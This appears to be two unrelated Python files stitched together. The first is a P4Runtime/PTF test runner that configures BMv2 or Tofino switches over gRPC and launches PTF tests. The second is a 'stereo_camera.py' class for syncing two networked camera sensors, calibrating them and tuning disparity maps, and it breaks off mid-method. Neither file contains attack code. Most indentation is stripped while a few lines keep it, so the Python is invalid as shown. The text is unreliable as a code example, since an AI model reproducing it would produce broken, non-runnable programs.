# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import Queue
import argparse
import json
import logging
import os
import re
import struct
import subprocess
import sys
import threading
from collections import OrderedDict
import google.protobuf.text_format
import grpc
from p4.tmp import p4config_pb2
from p4.v1 import p4runtime_pb2
from bmv2 import Bmv2Switch
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("PTF runner")
def error(msg, *args, **kwargs):
logger.error(msg, *args, **kwargs)
def warn(msg, *args, **kwargs):
logger.warn(msg, *args, **kwargs)
def info(msg, *args, **kwargs):
logger.info(msg, *args, **kwargs)
def check_ifaces(ifaces):
"""
Checks that required interfaces exist.
"""
ifconfig_out = subprocess.check_output(['ifconfig'])
iface_list = re.findall(r'^(\S+)', ifconfig_out, re.S | re.M)
present_ifaces = set(iface_list)
ifaces = set(ifaces)
return ifaces <= present_ifaces
def build_bmv2_config(bmv2_json_path):
"""
Builds the device config for BMv2
"""
device_config = p4config_pb2.P4DeviceConfig()
device_config.reassign = True
with open(bmv2_json_path) as f:
device_config.device_data = f.read()
return device_config
def build_tofino_config(prog_name, bin_path, cxt_json_path):
device_config = p4config_pb2.P4DeviceConfig()
with open(bin_path, 'rb') as bin_f:
with open(cxt_json_path, 'r') as cxt_json_f:
device_config.device_data = ""
device_config.device_data += struct.pack("<i", len(prog_name))
device_config.device_data += prog_name
tofino_bin = bin_f.read()
device_config.device_data += struct.pack("<i", len(tofino_bin))
device_config.device_data += tofino_bin
cxt_json = cxt_json_f.read()
device_config.device_data += struct.pack("<i", len(cxt_json))
device_config.device_data += cxt_json
return device_config
def update_config(p4info_path, bmv2_json_path, tofino_bin_path,
tofino_cxt_json_path, grpc_addr, device_id):
"""
Performs a SetForwardingPipelineConfig on the device
"""
channel = grpc.insecure_channel(grpc_addr)
stub = p4runtime_pb2.P4RuntimeStub(channel)
info("Sending P4 config")
# Send master arbitration via stream channel
# This should go in library, to be re-used also by base_test.py.
stream_out_q = Queue.Queue()
def stream_req_iterator():
while True:
p = stream_out_q.get()
if p is None:
break
yield p
def stream_recv(s):
pass
stream = stub.StreamChannel(stream_req_iterator())
stream_recv_thread = threading.Thread(target=stream_recv, args=(stream,))
stream_recv_thread.start()
req = p4runtime_pb2.StreamMessageRequest()
arbitration = req.arbitration
arbitration.device_id = device_id
election_id = arbitration.election_id
election_id.high = 0
election_id.low = 1
stream_out_q.put(req)
try:
# Set pipeline config.
request = p4runtime_pb2.SetForwardingPipelineConfigRequest()
request.device_id = device_id
election_id = request.election_id
election_id.high = 0
election_id.low = 1
config = request.config
with open(p4info_path, 'r') as p4info_f:
google.protobuf.text_format.Merge(p4info_f.read(), config.p4info)
if bmv2_json_path is not None:
device_config = build_bmv2_config(bmv2_json_path)
else:
device_config = build_tofino_config("name", tofino_bin_path,
tofino_cxt_json_path)
config.p4_device_config = device_config.SerializeToString()
request.action = p4runtime_pb2.SetForwardingPipelineConfigRequest.VERIFY_AND_COMMIT
try:
stub.SetForwardingPipelineConfig(request)
except Exception as e:
error("Error during SetForwardingPipelineConfig")
error(str(e))
return False
return True
finally:
stream_out_q.put(None)
stream_recv_thread.join()
def run_test(p4info_path, grpc_addr, device_id, cpu_port, ptfdir, port_map_path,
platform=None, extra_args=()):
"""
Runs PTF tests included in provided directory.
    Device must be running and configured with the appropriate P4 program.
"""
# TODO: check schema?
# "ptf_port" is ignored for now, we assume that ports are provided by
# increasing values of ptf_port, in the range [0, NUM_IFACES[.
port_map = OrderedDict()
with open(port_map_path, 'r') as port_map_f:
port_list = json.load(port_map_f)
for entry in port_list:
p4_port = entry["p4_port"]
iface_name = entry["iface_name"]
port_map[p4_port] = iface_name
if not check_ifaces(port_map.values()):
error("Some interfaces are missing")
return False
ifaces = []
# FIXME
# find base_test.py
pypath = os.path.dirname(os.path.abspath(__file__))
if 'PYTHONPATH' in os.environ:
os.environ['PYTHONPATH'] += ":" + pypath
else:
os.environ['PYTHONPATH'] = pypath
for iface_idx, iface_name in port_map.items():
ifaces.extend(['-i', '{}@{}'.format(iface_idx, iface_name)])
cmd = ['ptf']
cmd.extend(['--test-dir', ptfdir])
cmd.extend(ifaces)
test_params = 'p4info=\'{}\''.format(p4info_path)
test_params += ';grpcaddr=\'{}\''.format(grpc_addr)
test_params += ';device_id=\'{}\''.format(device_id)
test_params += ';cpu_port=\'{}\''.format(cpu_port)
if platform is not None:
test_params += ';pltfm=\'{}\''.format(platform)
cmd.append('--test-params={}'.format(test_params))
cmd.extend(extra_args)
info("Executing PTF command: {}".format(' '.join(cmd)))
try:
# we want the ptf output to be sent to stdout
p = subprocess.Popen(cmd)
p.wait()
except:
error("Error when running PTF tests")
return False
return p.returncode == 0
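# The port map JSON consumed by run_test() is a list of {"p4_port", "iface_name"}
# entries ("ptf_port" is currently ignored, see the comment above). A sketch that
# writes such a file; the interface names here are only an example.
def _write_example_port_map(path):
    port_map = [
        {"p4_port": 1, "iface_name": "veth1"},
        {"p4_port": 2, "iface_name": "veth3"},
    ]
    with open(path, 'w') as f:
        json.dump(port_map, f, indent=2)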
def check_ptf():
try:
with open(os.devnull, 'w') as devnull:
subprocess.check_call(['ptf', '--version'],
stdout=devnull, stderr=devnull)
return True
except subprocess.CalledProcessError:
return True
except OSError: # PTF not found
return False
# noinspection PyTypeChecker
def main():
parser = argparse.ArgumentParser(
description="Compile the provided P4 program and run PTF tests on it")
parser.add_argument('--device',
help='Target device',
type=str, action="store", required=True,
choices=['tofino', 'bmv2', 'stratum-bmv2'])
parser.add_argument('--p4info',
help='Location of p4info proto in text format',
type=str, action="store", required=True)
parser.add_argument('--bmv2-json',
help='Location BMv2 JSON output from p4c (if target is bmv2)',
type=str, action="store", required=False)
parser.add_argument('--tofino-bin',
help='Location of Tofino .bin output from p4c (if target is tofino)',
type=str, action="store", required=False)
parser.add_argument('--tofino-ctx-json',
help='Location of Tofino context.json output from p4c (if target is tofino)',
type=str, action="store", required=False)
parser.add_argument('--grpc-addr',
help='Address to use to connect to P4 Runtime server',
type=str, default='localhost:50051')
parser.add_argument('--device-id',
help='Device id for device under test',
type=int, default=1)
parser.add_argument('--cpu-port',
help='CPU port ID of device under test',
type=int, required=True)
parser.add_argument('--ptf-dir',
help='Directory containing PTF tests',
type=str, required=True)
parser.add_argument('--port-map',
help='Path to JSON port mapping',
type=str, required=True)
parser.add_argument('--platform',
help='Target platform on which tests are run (if target is tofino)',
type=str, required=False)
parser.add_argument('--skip-config',
help='Assume a device with pipeline already configured',
action="store_true", default=False)
parser.add_argument('--skip-test',
help='Skip test execution (useful to perform only pipeline configuration)',
action="store_true", default=False)
args, unknown_args = parser.parse_known_args()
if not check_ptf():
error("Cannot find PTF executable")
sys.exit(1)
device = args.device
bmv2_json = None
tofino_ctx_json = None
tofino_bin = None
if not os.path.exists(args.p4info):
error("P4Info file {} not found".format(args.p4info))
sys.exit(1)
if device == 'tofino':
if not os.path.exists(args.tofino_bin):
error("Tofino binary config file {} not found".format(
args.tofino_bin))
sys.exit(1)
if not os.path.exists(args.tofino_ctx_json):
error("Tofino context json file {} not found".format(
args.tofino_ctx_json))
sys.exit(1)
tofino_bin = args.tofino_bin
tofino_ctx_json = args.tofino_ctx_json
elif device == 'bmv2' or device == 'stratum-bmv2':
if not os.path.exists(args.bmv2_json):
error("BMv2 json file {} not found".format(args.bmv2_json))
sys.exit(1)
bmv2_json = args.bmv2_json
if not os.path.exists(args.port_map):
print "Port map path '{}' does not exist".format(args.port_map)
sys.exit(1)
grpc_port = args.grpc_addr.split(':')[1]
bmv2_sw = None
if device == 'bmv2':
bmv2_sw = Bmv2Switch(device_id=args.device_id,
port_map_path=args.port_map,
grpc_port=grpc_port,
cpu_port=args.cpu_port,
loglevel='debug')
bmv2_sw.start()
elif device == 'stratum-bmv2':
bmv2_sw = Bmv2Switch(device_id=args.device_id,
port_map_path=args.port_map,
grpc_port=grpc_port,
cpu_port=args.cpu_port,
loglevel='debug',
is_stratum=True)
bmv2_sw.start()
try:
success = True
if not args.skip_config:
success = update_config(p4info_path=args.p4info,
bmv2_json_path=bmv2_json,
tofino_bin_path=tofino_bin,
tofino_cxt_json_path=tofino_ctx_json,
grpc_addr=args.grpc_addr,
device_id=args.device_id)
if not success:
if bmv2_sw is not None:
bmv2_sw.kill()
sys.exit(2)
if not args.skip_test:
success = run_test(p4info_path=args.p4info,
device_id=args.device_id,
grpc_addr=args.grpc_addr,
cpu_port=args.cpu_port,
ptfdir=args.ptf_dir,
port_map_path=args.port_map,
platform=args.platform,
extra_args=unknown_args)
if bmv2_sw is not None:
bmv2_sw.kill()
if not success:
sys.exit(3)
except Exception:
if bmv2_sw is not None:
bmv2_sw.kill()
raise
if __name__ == '__main__':
main()
|
stereo_camera.py
|
from stereo_camera.network_agent import ImageReceiver
from stereo_camera.image_proc_tools import compute_disparity, process_stereo_image
from stereo_camera.errors import *
import cv2
import numpy as np
import os
import glob
import psutil
import time
import matplotlib.pyplot as plt
from threading import Thread, Event
from collections import deque
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor, as_completed
import typing
DELAY_TOL = 0.3
class StereoCamera:
"""Class representing a StereoCamera, composed by two ImageReceiver objects; it enables and simplifies the
concurrent communication with both sensors.
Attributes:
        _left_sensor --- ImageReceiver object related to the left sensor
        _right_sensor --- ImageReceiver object related to the right sensor
_io_ref_thread --- reference IO thread that reads from the left sensor's SUB socket and stores both the
timestamp and the frame as reference, respectively in _ref_timestamp and in _ref_frame fields
_ref_timestamp --- timestamp of the left frame, used as reference to find the right frame with minimum delay
_ref_frame --- left frame, used as reference
_data_ready_ref --- event that notifies the main process when new data has been read from the left sensor
_io_sec_thread --- secondary IO thread that reads from the right sensor's SUB socket and stores the pair
(timestamp, frame) in the _sec_buffer queue
_sec_buffer --- queue which keeps the 5 most recent frames from the right sensor
_data_ready_sec --- event that notifies the main process when new data has been read from the right sensor
_trigger_kill_threads --- event that kills the two IO threads
_calib_params --- dictionary containing the calibration parameters (initially empty)
_disp_params --- dictionary containing the disparity parameters (initially empty)
_is_calibrated --- boolean variable indicating whether the stereo sensor is calibrated or not
(initially set to 'False')
_has_disparity_params --- boolean variable indicating whether the stereo sensor has disparity
_parameters set or not (initially set to 'False')
_disp_bounds --- tuple of floats representing the minimum and maximum disparity values detected
Methods:
multicast_send_sig --- method which enables the concurrent sending of a control signal via the
two ImageReceiver objects
multicast_recv_sig --- method which enables the concurrent reception of a control signal via the
two ImageReceiver objects
_create_io_threads --- method which creates and starts the two IO threads to read the frames in background
_kill_io_threads --- method which kills the two IO threads
_recv_frame_in_background_sec --- target of the secondary IO thread: it repeatedly reads new data from the right
sensor and stores it in a queue
_recv_frame_in_background_ref --- target of the reference IO thread: it repeatedly reads new data from the left
sensor and stores it in a field
_read_stereo_frames --- method that determines which right frame in the queue has the minimum delay w.r.t. the
reference frame, and returns the stereo pair
load_calib_params --- method which reads the calibration parameters from a given file
_set_calib_params --- method which sets/updates the calibration parameters
_save_calib_params --- method which persists the calibration parameters to a given file
load_disp_params --- method which reads the disparity parameters from a given file
_set_disp_params --- method which sets/updates the disparity parameters
_save_disp_params --- method which persists the disparity parameters to a given file
_flush_pending_stereo_frames --- method which flushes both image sockets
close --- method which releases the network resources used by the two ImageReceiver objects
capture_sample_images --- method which captures sample images for calibration
calibrate --- given the sample images, it computes the calibration parameters"""
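# Minimal usage sketch (illustrative only): the IP addresses and ports below are
# placeholders, and the calibration/disparity file names are assumed to already exist.
#
#   cam = StereoCamera("192.168.1.10", "192.168.1.11", img_port=5555, ctrl_port=5556)
#   cam.load_calib_params("calib")   # reads calib.npz
#   cam.load_disp_params("disp")     # reads disp.npz
#   cam.realtime_disp_map()          # streams until 'q' is pressed
#   cam.close()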
def __init__(self, ip_addrL: str, ip_addrR: str, img_port: int, ctrl_port: int):
# Set up one ImageReceiver object for each sensor
self._left_sensor = ImageReceiver(ip_addrL, img_port, ctrl_port)
self._right_sensor = ImageReceiver(ip_addrR, img_port, ctrl_port)
# Set up two IO threads to read from the two sensors
self._io_ref_thread = None
self._ref_timestamp = None
self._ref_frame = None
self._data_ready_ref = Event()
self._io_sec_thread = None
self._sec_buffer = deque(maxlen=5)
self._data_ready_sec = Event()
self._trigger_kill_threads = Event()
# Calibration data
self._calib_params = {}
self._disp_params = {}
self._is_calibrated = False
self._has_disparity_params = False
# Keep track of min and max disparities
self._disp_bounds = [np.inf, -np.inf]
def multicast_send_sig(self, sig: bytes):
"""Method which enables the concurrent sending of a signal to both ImageReceiver objects
:param sig: string representing the signal to be sent concurrently to both sensors"""
with ThreadPoolExecutor(max_workers=2) as executor:
executor.submit(self._left_sensor.send_sig, sig)
executor.submit(self._right_sensor.send_sig, sig)
def multicast_recv_sig(self) -> (str, str):
"""Method which enables the concurrent reception of a signal from both ImageSender objects
:returns a tuple containing the two messages received"""
with ThreadPoolExecutor(max_workers=2) as executor:
futureL = executor.submit(self._left_sensor.recv_sig)
futureR = executor.submit(self._right_sensor.recv_sig)
sigL = futureL.result()
sigR = futureR.result()
return sigL, sigR
def _create_io_threads(self):
"""Methods which creates and starts the IO thread."""
self._trigger_kill_threads.clear()
self._io_ref_thread = Thread(target=self._recv_frame_in_background_ref, args=())
self._io_sec_thread = Thread(target=self._recv_frame_in_background_sec, args=())
self._io_ref_thread.start()
self._io_sec_thread.start()
def _kill_io_threads(self):
"""Methods which kills the IO threads, clears the thread events concerning data, and flushes the sockets."""
self._trigger_kill_threads.set()
self._io_ref_thread.join()
self._io_sec_thread.join()
# Clear events
self._data_ready_ref.clear()
self._data_ready_sec.clear()
# Set to None reference frame and reference timestamp, and clear the buffer
self._ref_frame = None
self._ref_timestamp = None
self._sec_buffer.clear()
# Flush pending frames
self._flush_pending_stereo_frames()
print("\nPending frames flushed.")
def _recv_frame_in_background_ref(self):
"""Methods which is meant to be executed by the reference IO thread: it repeatedly reads in background a frame
from the left sensor and stores it as the reference frame and timestamp."""
while not self._trigger_kill_threads.is_set():
tstamp, frame = self._left_sensor.recv_frame()
self._ref_frame = frame
self._ref_timestamp = tstamp
self._data_ready_ref.set()
def _recv_frame_in_background_sec(self):
"""Methods which is meant to be executed by the secondary IO thread: it repeatedly reads in background a frame
from the right sensor and saves it in a temporary buffer."""
while not self._trigger_kill_threads.is_set():
self._sec_buffer.append(self._right_sensor.recv_frame())
self._data_ready_sec.set()
def _read_stereo_frames(self) -> (np.ndarray, np.ndarray):
"""Method which reads from the IO thread the most recent pair of stereo frames.
:returns a tuple containing the two frames"""
if not self._data_ready_ref.wait(timeout=1.0):
raise TimeoutError("Timeout while reading from the left sensors.")
if not self._data_ready_sec.wait(timeout=1.0):
raise TimeoutError("Timeout while reading from the right sensors.")
delay_dict = {
abs(self._ref_timestamp - _sec_timestamp): _sec_frame
for _sec_timestamp, _sec_frame in self._sec_buffer
}
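# Dict keys are the (unique) absolute delays, so min() over the items picks the
# right-sensor frame closest in time to the reference left frame.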
best_left_right_delay, best_match_frame = min(delay_dict.items())
self._data_ready_ref.clear()
self._data_ready_sec.clear()
if best_left_right_delay > DELAY_TOL:
raise OutOfSyncError(best_left_right_delay)
latency = time.time() - self._ref_timestamp
print(
f"\rLatency: {latency:.3f} s --- Left-Right Delay: {best_left_right_delay:.3f} s",
end="",
)
return self._ref_frame, best_match_frame
def load_calib_params(self, calib_file: str):
# Load calibration parameters from file
calib_params = np.load(calib_file + ".npz")
# Set object's calibration parameters
self._set_calib_params(calib_params)
def _set_calib_params(self, calib_params):
# Update object's calibration parameters
self._calib_params.update(calib_params)
self._is_calibrated = True
def _save_calib_params(self, calib_file: str):
# Copy the dictionary and add a key-value pair representing the file path
# (required by NumPy 'savez_compressed' function)
calib_file_to_save = self._calib_params.copy()
calib_file_to_save["file"] = calib_file
# Save calibration parameters to file
np.savez_compressed(**calib_file_to_save)
def load_disp_params(self, disp_file: str):
# Load disparity parameters from file
disp_params = {
k: int(v) for k, v in np.load(disp_file + ".npz").items() if k != "file"
}
# Set object's disparity parameters
self._set_disp_params(disp_params)
def _set_disp_params(self, disp_params):
# Update object's disparity parameters
self._disp_params.update(disp_params)
self._has_disparity_params = True
def _save_disp_params(self, disp_file: str):
# Copy the dictionary and add a key-value pair representing the file path
# (required by NumPy 'savez_compressed' function)
disp_file_to_save = self._disp_params.copy()
disp_file_to_save["file"] = disp_file
# Save disparity parameters to file
np.savez_compressed(**disp_file_to_save)
def _flush_pending_stereo_frames(self):
"""Method that flushes the pending frames of both ImageReceiver objects."""
self._left_sensor.flush_pending_frames()
self._right_sensor.flush_pending_frames()
def _reset_sensors(self):
# Send reset signal to both sensors
self.multicast_send_sig(b"RESET")
# Kill IO threads
self._kill_io_threads()
# Wait for ready signal from sensors and then send start signal
sigL, sigR = self.multicast_recv_sig()
print(f"Left sensor: {sigL}")
print(f"Right sensor: {sigR}")
print("Both sensors are ready")
self.multicast_send_sig(b"START")
# Re-create IO threads
self._create_io_threads()
def close(self):
"""Method that closes the sockets and the contexts of both ImageSender objects to free resources."""
self._left_sensor.close()
self._right_sensor.close()
def capture_sample_images(self, img_folder: str):
"""Method which captures sample stereo images
:param img_folder: string representing the path to the folder in which images will be saved"""
print("Collecting images of a chessboard for calibration...")
# Initialize variables for countdown
n_pics, tot_pics = 0, 30
n_sec, tot_sec = 0, 4
str_sec = "4321"
# Define folders where calibration images will be stored
pathL = os.path.join(img_folder, "L")
pathR = os.path.join(img_folder, "R")
# Wait for ready signal from sensors
sigL, sigR = self.multicast_recv_sig()
print(f"Left sensor: {sigL}")
print(f"Right sensor: {sigR}")
print("Both sensors are ready")
# Synchronize sensors with a start signal
self.multicast_send_sig(b"START")
self._create_io_threads()
# Save start time
start_time = time.time()
while True:
# Get frames from both cameras
try:
frameL, frameR = self._read_stereo_frames()
except OutOfSyncError as e:
print(
f"\nThe two sensors are out of sync of {e.delay:3f} s and must be restarted."
)
self._reset_sensors()
continue
# Flip frames horizontally so the on-screen preview behaves like a mirror
flipped_frameL = cv2.flip(frameL, 1)
flipped_frameR = cv2.flip(frameR, 1)
# Display counter on screen before saving frame
if n_sec < tot_sec:
# Draw on screen the current remaining pictures
cv2.putText(
img=flipped_frameL,
text=f"{n_pics}/{tot_pics}",
org=(int(10), int(40)),
fontFace=cv2.FONT_HERSHEY_DUPLEX,
fontScale=1,
color=(255, 255, 255),
thickness=3,
lineType=cv2.LINE_AA,
)
# Draw on screen the current remaining seconds
cv2.putText(
img=flipped_frameR,
text=str_sec[n_sec],
org=(int(10), int(40)),
fontFace=cv2.FONT_HERSHEY_DUPLEX,
fontScale=1,
color=(255, 255, 255),
thickness=3,
lineType=cv2.LINE_AA,
)
# If time elapsed is greater than one second, update 'n_sec'
time_elapsed = time.time() - start_time
if time_elapsed >= 1:
n_sec += 1
start_time = time.time()
else:
# When countdown ends, save original grayscale image to file
gray_frameL = cv2.cvtColor(frameL, cv2.COLOR_BGR2GRAY)
gray_frameR = cv2.cvtColor(frameR, cv2.COLOR_BGR2GRAY)
cv2.imwrite(os.path.join(pathL, f"{n_pics:02d}" + ".jpg"), gray_frameL)
cv2.imwrite(os.path.join(pathR, f"{n_pics:02d}" + ".jpg"), gray_frameR)
# Update counters
n_pics += 1
n_sec = 0
print(f"\n{n_pics}/{tot_pics} images collected.")
# Display side by side the flipped frames
frames = np.hstack((flipped_frameR, flipped_frameL))
cv2.imshow("Left and right frames", frames)
# If 'q' is pressed, or enough images are collected,
# termination signal is sent to the sensors and streaming ends
if (cv2.waitKey(1) & 0xFF == ord("q")) or n_pics == tot_pics:
self.multicast_send_sig(b"STOP")
self._kill_io_threads()
break
cv2.destroyAllWindows()
print("Images collected.")
def calibrate(
self,
img_folder: str,
pattern_size: typing.Tuple[int, int],
square_length: float,
calib_file: str,
):
"""Computes the calibration parameters of a sensor by using several pictures of a chessboard
:param img_folder: string representing the path to the folder in which images are saved
:param pattern_size: size of the chessboard used for calibration
:param square_length: float representing the length, in mm, of the square edge
:param calib_file: path to the file where calibration parameters will be saved"""
# Define folders where calibration images will be stored
pathL = os.path.join(img_folder, "L")
pathR = os.path.join(img_folder, "R")
# Get a list of images captured, one per folder
img_namesL = glob.glob(os.path.join(pathL, "*.jpg"))
img_namesR = glob.glob(os.path.join(pathR, "*.jpg"))
# If one of the two lists is empty, raise exception
if len(img_namesL) == 0 or len(img_namesR) == 0:
raise CalibrationImagesNotFoundError(img_folder)
# Produce a list of pairs '(right_image, left_image)'
# If one list has more elements than the other, the extra elements will be automatically discarded by 'zip'
img_name_pairs = list(zip(img_namesL, img_namesR))
# Get number of available cores
n_procs = psutil.cpu_count(logical=False)
# Process in parallel stereo images
stereo_img_names = []
stereo_img_points_list = []
stereo_img_drawn_corners_list = []
with ProcessPoolExecutor(max_workers=n_procs) as executor:
futures = [
executor.submit(process_stereo_image, img_name_pair, pattern_size)
for img_name_pair in img_name_pairs
]
for future in as_completed(futures):
try:
(
stereo_img_name,
stereo_img_points,
stereo_img_drawn_corners,
) = future.result()
stereo_img_names.append(stereo_img_name)
stereo_img_points_list.append(stereo_img_points)
stereo_img_drawn_corners_list.append(stereo_img_drawn_corners)
except ChessboardNotFoundError as e:
print(f"No chessboard found in image {e.file}")
# If no chessboard was detected, raise exception
if len(stereo_img_points_list) == 0:
raise ChessboardNotFoundError(img_folder)
# Produce two lists of image points, one for the left and one for the right camera
stereo_img_points_unzipped = [list(t) for t in zip(*stereo_img_points_list)]
img_pointsL = stereo_img_points_unzipped[0]
img_pointsR = stereo_img_points_unzipped[1]
# Prepare object points by obtaining a grid, scaling it by the square edge length and reshaping it
pattern_points = np.zeros(
[pattern_size[0] * pattern_size[1], 3], dtype=np.float32
)
pattern_points[:, :2] = (
np.indices(pattern_size, dtype=np.float32) * square_length
).T.reshape(-1, 2)
# Append them to a list with the same length as the image-point lists
obj_points = []
for i in range(0, len(img_pointsL)):
obj_points.append(pattern_points)
# Get sensor size
h, w = stereo_img_drawn_corners_list[0][0].shape[:2]
# Calibrate concurrently single cameras and get the sensor intrinsic parameters
print("Calibrating left and right sensors...")
with ProcessPoolExecutor(max_workers=2) as executor:
futureL = executor.submit(
cv2.calibrateCamera, obj_points, img_pointsL, (w, h), None, None
)
futureR = executor.submit(
cv2.calibrateCamera, obj_points, img_pointsR, (w, h), None, None
)
rmsL, cam_mtxL, distL, _, _ = futureL.result()
rmsR, cam_mtxR, distR, _, _ = futureR.result()
print(f"Left sensor calibrated, RMS = {rmsL:.5f}")
print(f"Right sensor calibrated, RMS = {rmsR:.5f}")
# Use the intrinsic parameters to calibrate the stereo sensor more reliably
print("Calibrating stereo sensor...")
flag = cv2.CALIB_FIX_INTRINSIC
(
error,
cam_mtxL,
distL,
cam_mtxR,
distR,
rot_mtx,
trasl_mtx,
e_mtx,
f_mtx,
) = cv2.stereoCalibrate(
obj_points,
img_pointsL,
img_pointsR,
cam_mtxL,
distL,
cam_mtxR,
distR,
(w, h),
flags=flag,
)
print(f"Stereo sensor calibrated, error: {error:.5f}")
(
rot_mtxL,
rot_mtxR,
proj_mtxL,
proj_mtxR,
disp_to_depth_mtx,
valid_ROIL,
valid_ROIR,
) = cv2.stereoRectify(
cam_mtxL, distL, cam_mtxR, distR, (w, h), rot_mtx, trasl_mtx
)
# Compute the undistortion and rectification maps
mapxL, mapyL = cv2.initUndistortRectifyMap(
cam_mtxL, distL, rot_mtxL, proj_mtxL, (w, h), cv2.CV_32FC1
)
mapxR, mapyR = cv2.initUndistortRectifyMap(
cam_mtxR, distR, rot_mtxR, proj_mtxR, (w, h), cv2.CV_32FC1
)
# Save all sensor parameters to .npz files
calib_params = {
"cam_mtxL": cam_mtxL,
"cam_mtxR": cam_mtxR,
"disp_to_depth_mtx": disp_to_depth_mtx,
"distL": distL,
"distR": distR,
"mapxL": mapxL,
"mapxR": mapxR,
"mapyL": mapyL,
"mapyR": mapyR,
"proj_mtxL": proj_mtxL,
"proj_mtxR": proj_mtxR,
"rot_mtx": rot_mtx,
"rot_mtxL": rot_mtxL,
"rot_mtxR": rot_mtxR,
"trasl_mtx": trasl_mtx,
"valid_ROIL": valid_ROIL,
"valid_ROIR": valid_ROIR,
}
self._set_calib_params(calib_params)
self._save_calib_params(calib_file)
print("Calibration parameters saved to file")
# Plot the images with corners drawn on the chessboard and with calibration applied
for i in range(0, len(stereo_img_names)):
stereo_img_drawn_corners = stereo_img_drawn_corners_list[i]
fig, ax = plt.subplots(nrows=2, ncols=2)
fig.suptitle(stereo_img_names[i])
# Plot the original images
ax[0][0].imshow(stereo_img_drawn_corners[0])
ax[0][0].set_title("L frame")
ax[0][1].imshow(stereo_img_drawn_corners[1])
ax[0][1].set_title("R frame")
# Remap images using the mapping found after calibration
dstL = cv2.remap(
stereo_img_drawn_corners[0], mapxL, mapyL, cv2.INTER_NEAREST
)
dstR = cv2.remap(
stereo_img_drawn_corners[1], mapxR, mapyR, cv2.INTER_NEAREST
)
# Plot the undistorted images
ax[1][0].imshow(dstL)
ax[1][0].set_title("L frame undistorted")
ax[1][1].imshow(dstR)
ax[1][1].set_title("R frame undistorted")
plt.show()
def undistort_rectify(
self, frameL: np.ndarray, frameR: np.ndarray
) -> (np.ndarray, np.ndarray):
# Check calibration data
if not self._is_calibrated:
raise MissingParametersError("Calibration")
# Undistort and rectify using calibration data
dstL = cv2.remap(
frameL,
self._calib_params["mapxL"],
self._calib_params["mapyL"],
cv2.INTER_LINEAR,
)
dstR = cv2.remap(
frameR,
self._calib_params["mapxR"],
self._calib_params["mapyR"],
cv2.INTER_LINEAR,
)
return dstL, dstR
def disp_map_tuning(self, disp_file: str):
"""Allows to tune the disparity map
:param disp_file: path to the file where disparity parameters will be saved"""
print("Disparity map tuning...")
# Check calibration data
if not self._is_calibrated:
raise MissingParametersError("Calibration")
# Wait for ready signal from sensors
sigL, sigR = self.multicast_recv_sig()
print(f"Left sensor: {sigL}")
print(f"Right sensor: {sigR}")
print("Both sensors are ready")
# Initialize variables for countdown
n_sec, tot_sec = 0, 4
str_sec = "4321"
# Synchronize sensors with a start signal
self.multicast_send_sig(b"START")
self._create_io_threads()
# Save start time
start_time = time.time()
dstL, dstR = None, None
while True:
# Get frames from both cameras and apply sensor corrections
try:
frameL, frameR = self._read_stereo_frames()
except OutOfSyncError as e:
print(
f"\nThe two sensors are out of sync of {e.delay:3f} s and must be restarted."
)
self._reset_sensors()
continue
dstL, dstR = self.undistort_rectify(frameL, frameR)
# Flip frames horizontally so the on-screen preview behaves like a mirror
flipped_dstL = cv2.flip(dstL, 1)
flipped_dstR = cv2.flip(dstR, 1)
if n_sec < tot_sec:
# Draw on screen the current remaining seconds
cv2.putText(
img=flipped_dstR,
text=str_sec[n_sec],
org=(int(10), int(40)),
fontFace=cv2.FONT_HERSHEY_DUPLEX,
fontScale=1,
color=(255, 255, 255),
thickness=3,
lineType=cv2.LINE_AA,
)
# If time elapsed is greater than one second, update 'n_sec'
time_elapsed = time.time() - start_time
if time_elapsed >= 1:
n_sec += 1
start_time = time.time()
else:
self.multicast_send_sig(b"STOP")
self._kill_io_threads()
break
# Display side by side the frames
frames = np.hstack((flipped_dstR, flipped_dstL))
cv2.imshow("Left and right frames", frames)
cv2.waitKey(1)
cv2.destroyAllWindows()
print("Sample image captured.")
# Create named window and sliders for tuning
window_label = "Disparity tuning"
MDS_label = "Minimum Disparity"
MDS_label_neg = "Minimum Disparity (negative)"
NOD_label = "Number of Disparities"
SWS_label = "SAD window size"
PFC_label = "PreFilter Cap"
D12MD_label = "Disp12MaxDiff"
UR_label = "Uniqueness Ratio"
SPWS_label = "Speckle Window Size"
SR_label = "Speckle Range"
M_label = "Mode"
cv2.namedWindow(window_label)
cv2.createTrackbar(MDS_label, window_label, 0, 40, lambda *args: None)
cv2.createTrackbar(MDS_label_neg, window_label, 0, 40, lambda *args: None)
cv2.createTrackbar(NOD_label, window_label, 0, 256, lambda *args: None)
cv2.createTrackbar(SWS_label, window_label, 1, 15, lambda *args: None)
cv2.createTrackbar(PFC_label, window_label, 0, 100, lambda *args: None)
cv2.createTrackbar(D12MD_label, window_label, 0, 300, lambda *args: None)
cv2.createTrackbar(UR_label, window_label, 0, 20, lambda *args: None)
cv2.createTrackbar(SPWS_label, window_label, 0, 300, lambda *args: None)
cv2.createTrackbar(SR_label, window_label, 0, 5, lambda *args: None)
cv2.createTrackbar(M_label, window_label, 0, 1, lambda *args: None)
while True:
# Retrieve values set by trackers
MDS = cv2.getTrackbarPos(MDS_label, window_label)
MDS_neg = cv2.getTrackbarPos(MDS_label_neg, window_label)
if MDS == 0:
MDS = -MDS_neg
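# OpenCV trackbars cannot hold negative values, so a second slider supplies the
# magnitude of a negative minimum disparity when the first one is left at zero.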
# Convert NOD to next multiple of 16
NOD = cv2.getTrackbarPos(NOD_label, window_label)
NOD = NOD - (NOD % 16) + 16
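# (StereoSGBM requires numDisparities to be a positive multiple of 16)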
# Convert SWS to the next odd number (StereoSGBM requires an odd block size)
SWS = cv2.getTrackbarPos(SWS_label, window_label)
SWS = SWS - (SWS % 2) + 1
P1 = 8 * 3 * SWS ** 2
P2 = 32 * 3 * SWS ** 2
D12MD = cv2.getTrackbarPos(D12MD_label, window_label)
UR = cv2.getTrackbarPos(UR_label, window_label)
SPWS = cv2.getTrackbarPos(SPWS_label, window_label)
SR = cv2.getTrackbarPos(SR_label, window_label)
PFC = cv2.getTrackbarPos(PFC_label, window_label)
M = cv2.getTrackbarPos(M_label, window_label)
# Create and configure left and right stereo matchers
stereo_matcher = cv2.StereoSGBM_create(
minDisparity=MDS,
numDisparities=NOD,
blockSize=SWS,
P1=P1,
P2=P2,
disp12MaxDiff=D12MD,
uniquenessRatio=UR,
speckleWindowSize=SPWS,
speckleRange=SR,
preFilterCap=PFC,
mode=M,
)
# Compute disparity map
